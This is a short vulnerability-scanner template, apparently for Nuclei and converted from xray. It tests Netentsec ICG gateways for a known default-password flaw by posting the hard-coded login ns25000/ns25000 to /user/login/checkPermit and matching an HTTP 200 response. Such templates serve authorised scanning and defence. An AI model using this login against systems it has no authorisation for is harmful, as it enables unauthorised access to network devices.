id: poc-yaml-netentsec-icg-default-password

info:
  name: poc-yaml-netentsec-icg-default-password
  author: B1anda0(https://github.com/B1anda0)
  severity: high
  tags: xray-converted,ct-158139
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603

http:
  - raw:
      - |
        POST /user/login/checkPermit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        usrname=ns25000&pass=ns25000

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200